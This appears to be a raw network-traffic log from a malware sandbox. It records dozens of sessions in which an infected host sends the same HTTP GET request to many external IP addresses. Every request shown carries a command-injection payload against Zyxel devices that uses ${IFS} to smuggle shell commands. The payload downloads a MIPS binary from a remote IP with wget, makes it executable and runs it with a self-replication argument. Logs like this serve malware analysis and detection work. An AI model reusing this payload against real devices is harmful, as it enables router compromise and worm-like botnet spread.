                                        Jan 14, 2024 16:18:59.813294888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8477192.168.2.1357130124.18.213.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813348055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8478192.168.2.135001057.85.213.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813436985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8479192.168.2.135361487.212.111.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813496113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8480192.168.2.135377654.116.36.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813549042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8481192.168.2.1358720157.87.5.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813611984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8482192.168.2.134985240.199.197.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813656092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8483192.168.2.1358506205.88.66.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813731909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8484192.168.2.1332998163.14.193.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813757896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8485192.168.2.135560485.25.251.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813822031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8486192.168.2.133607868.86.241.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813935995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8487192.168.2.1360026207.226.135.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813977957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8488192.168.2.133687498.12.190.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814027071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8489192.168.2.135657846.255.98.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814079046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8490192.168.2.133505297.185.54.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814157963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8491192.168.2.1343390201.4.135.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814209938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8492192.168.2.1332804194.108.214.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814245939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8493192.168.2.1352810112.14.57.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814302921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8494192.168.2.1345442128.29.247.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814378977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8495192.168.2.134277054.11.91.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814471960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8496192.168.2.1342824210.96.150.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814491987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8497192.168.2.1339946210.39.57.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814574957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8498192.168.2.135586425.72.85.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814631939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8499192.168.2.1334348170.99.109.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814688921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8500192.168.2.1339124204.202.200.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814745903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8501192.168.2.1343378222.5.205.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814789057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8502192.168.2.1346538145.3.217.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814831972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8503192.168.2.1347876133.172.104.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814898968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8504192.168.2.1345522190.171.237.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814932108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8505192.168.2.134052219.159.44.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.814999104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8506192.168.2.1348300210.187.52.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815077066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8507192.168.2.1356918105.33.50.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815138102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8508192.168.2.134837072.61.198.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815224886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8509192.168.2.135613848.171.243.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815288067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8510192.168.2.1335256194.130.17.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815347910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8511192.168.2.1338822116.124.95.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815412045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8512192.168.2.135195478.48.29.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815459013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8513192.168.2.1340020153.125.192.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815505028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8514192.168.2.1338738201.97.7.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815542936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8515192.168.2.134308214.19.170.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815598011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8516192.168.2.133369223.60.79.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815671921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8517192.168.2.135027453.136.18.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815712929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8518192.168.2.1349874118.121.73.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815787077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8519192.168.2.135554893.239.219.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815841913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8520192.168.2.1339258103.172.57.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815908909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8521192.168.2.1348676146.150.195.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.815963030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8522192.168.2.1347592198.147.38.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816047907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8523192.168.2.133768257.84.135.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816098928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8524192.168.2.135542472.89.138.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816167116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8525192.168.2.1337532158.215.222.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816234112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8526192.168.2.1355728193.142.96.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816308975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8527192.168.2.134369894.180.31.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816378117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8528192.168.2.134471023.154.248.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816394091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8529192.168.2.135479238.181.237.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816482067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8530192.168.2.134162486.42.95.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816534042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8531192.168.2.1355360176.141.219.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816598892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8532192.168.2.135625470.24.146.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816667080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8533192.168.2.134900459.111.28.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816684008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8534192.168.2.1352926141.134.41.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816775084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8535192.168.2.13574222.142.205.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816844940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8536192.168.2.1334980202.239.150.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816890955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8537192.168.2.1348558116.202.47.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.816962957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8538192.168.2.1353180129.16.210.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817035913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8539192.168.2.1347838111.14.12.214443
                                        TimestampBytes transferredDirectionData
